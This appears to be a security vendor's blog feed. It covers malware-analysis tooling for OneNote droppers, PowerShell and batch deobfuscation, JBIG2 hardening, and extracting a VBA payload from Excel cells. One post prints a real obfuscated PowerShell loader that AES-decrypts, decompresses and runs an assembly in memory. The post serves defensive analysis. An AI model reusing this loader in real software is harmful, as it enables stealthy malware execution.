An interesting sample containing a number of different obfuscation techniques. In this article we analyze the dropper in detail and reach the final stage.
SHA256: 0B93B5287841CEF2C6B2F2C3221C59FFD61BF772CD0D8B2BDAB9DADEB570C7A6
The first file we encounter is a OneNote document. If the “OneNote Format” package is installed, all files are automatically extracted.
PowerShell code is often seen in malware. To help the analysis of such code we have just released the “PowerShell Beautifier” package. The package is available to all commercial licenses of Cerbero Suite Advanced.
The package features a complete parser for the PowerShell language and has many deobfuscation capabilities. If your organization is interested in integrating our PowerShell beautifier in a cloud service, please contact us.
The beautifier can be invoked as an action: Ctrl+R -> PowerShell -> PowerShell Beautifier.
Let’s look at an example of obfuscated PowerShell code:
$mcWPL = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join
'')('%~f0').Split([Environment]::NewLine);foreach ($jBqHb in $mcWPL) { if
($jBqHb.StartsWith(':: ')) { $qUflk = $jBqHb.Substring(3); break; }; };$AKzOG =
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qUflk);$GTqqO =
New-Object System.Security.Cryptography.AesManaged;$GTqqO.Mode =
[System.Security.Cryptography.CipherMode]::CBC;$GTqqO.Padding =
[System.Security.Cryptography.PaddingMode]::PKCS7;$GTqqO.Key =
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join
'')('rYCDvAfAeZYTmiLeZKnw0z4us9jgkCckB7mS60qxxg4=');$GTqqO.IV =
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join
'')('JYh62EWEKCuIH7WrUJ0VdA==');$QTfFw = $GTqqO.CreateDecryptor();$AKzOG =
$QTfFw.TransformFinalBlock($AKzOG, 0,
$AKzOG.Length);$QTfFw.Dispose();$GTqqO.Dispose();$xVFCH = New-Object
System.IO.MemoryStream(, $AKzOG);$qGLhv = New-Object
System.IO.MemoryStream;$wRtOX = New-Object
System.IO.Compression.GZipStream($xVFCH,
[IO.Compression.CompressionMode]::Decompress);$wRtOX.CopyTo($qGLhv);$wRtOX.Dispose
();$xVFCH.Dispose();$qGLhv.Dispose();$AKzOG = $qGLhv.ToArray();$VBqqY =
[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($AKzOG);$ReoQh =
$VBqqY.EntryPoint;$ReoQh.Invoke($null, (, [string[]] ('%*')))
To help in the analysis of malware which uses Windows batch scripts we just released a package on Cerbero Store called “Simple Batch Emulator”. The name of the package is self-explanatory as it provides a basic emulator for batch scripts. The package is available to all commercial licenses of Cerbero Suite Advanced.
The following is a malicious OneNote document. All embedded files are automatically extracted thanks to the “OneNote Format” package.
Two of the embedded files are batch scripts. We can execute the action to emulate the obfuscated batch code.
The malicious OneNote sample analyzed in this video contains an executable. The executable contains a CAB archive in a resource entry. The CAB archive contains a VBS script which can directly be inspected in Cerbero Suite.
SHA256: F408EF3FA89546483BA63F58BE3F27A98795655EB4B9B6217CBE302A5BA9D5F7
Microsoft OneNote is rising in popularity as a vector for malware. Therefore, all commercial licenses of Cerbero Suite can now download our “OneNote Format” package from Cerbero Store which parses the OneNote format and extracts embedded files.
Installing the package from Cerbero Store takes only a few mouse clicks.
Once the package is installed, you can directly inspect OneNote documents in Cerbero Suite and all embedded files are automatically extracted and ready to be inspected.
The 2nd issue of Cerbero Journal, our company e-zine, is out!
In this issue we discuss the release of Cerbero Suite 6 and Cerbero Engine 3, new and improved cloud packages, improvements to our PDF parser, PDF malware hiding in images, one way we tested Cerbero Suite on the field and much more!
We’re happy to announce the release of Cerbero Suite 6.1 and Cerbero Engine 3.1!
This release contains many improvements to our PDF support.
Our PDF support has been featuring the capability to decode JBIG2 streams for many years.
JBIG2 is an imperative file format which has been demonstrated can be Turing complete. In fact, one of the most sophisticated exploits has been created exploiting a JBIG2 library in iOS. The exploit mentioned in the article creates over 70,000 segments to create a small virtual machine in logical operations defined by JBIG2.
In a recent release we made our already hardened JBIG2 decoding support even more secure by relegating it to a different process and constraining it to a time threshold.
This release features a completely rewritten JBIG2 library. Not only is it faster than the previous one, but it also has constraints on allocation and processing time by default. Therefore, now the library is being run again in the same process and it’s even faster than before.
For the customers of our engine: it is still possible to use the old JBIG2 library:
pdf.SetJBIG2LibraryVersion(1)
By default version 2 (the new library) is used.
Continue reading “Cerbero Suite 6.1 and Cerbero Engine 3.1 are out!”
We’re happy to announce the release of Cerbero Suite 6 and Cerbero Engine 3!
All of our customers can upgrade at a 50% discount their licenses for the next 3 months. We value our customers and everyone who has bought a license in August should have received a free upgrade for Cerbero Suite 6. Everyone who has purchased a license before August, but in the last 3 months, should have received an additional discount. Commercial customers with an active subscription plan should have already received a license for Cerbero Suite 6.
If you’re a customer of Cerbero Suite 5 and didn’t get an email from us, please contact us at sales@cerbero.io.
So what’s new?
While we published this package on Cerbero Store in August, it was actually planned for the 6.0 release: one of the main reasons for the introduction of Cerbero Store was the ability to offer certain types of updates as soon as they were ready.
Check out the video presentation for a quick introduction to the Sample Downloader package.
Installing the package from Cerbero Store takes only a few clicks. Once installed, you can go to the settings and enter your API keys for the supported intelligence services.
Continue reading “Cerbero Suite 6 and Cerbero Engine 3 are out!”
We have just released our Sample Downloader package and it is available for all licenses of Cerbero Suite Advanced.
While this is a simple package, we consider it extremely useful, as it allows to download malware samples by their hash. The package tries to download the requested samples from various supported intelligence services.
Check out the video presentation for a quick introduction!
Installing the Sample Downloader package from Cerbero Store takes only a few clicks. Once installed, you can go to the settings and enter your API keys for the supported intelligence services.
The malware sample analyzed in this video uses VBA code to extract a payload contained in Excel spreadsheet cells.
SHA256: F00252AB17546CD922B9BDA75942BEBFED4F6CDA4AE3E02DC390B40599CE1740
The following is the Python code which mimics the VBA extraction code.
from Pro.SiliconSpreadsheet import *
from Pro.UI import proContext
v = proContext().getCurrentAnalysisView()
if v.isValid():
view = SiliconSpreadsheetWorkspaceView(v)
ws = view.getSpreadsheetWorkspace()
sheet = ws.sheetFromName("Final Offer")
col = SiliconSpreadsheetUtil.colIndex("BS")
text = ""
for i in range(100, 701):
cell = sheet.getCell(col, i)
if cell.isEmpty():
continue
text += cell.value
print(text[::-1])
Note: the code must be executed while the spreadsheet is open in the analysis view.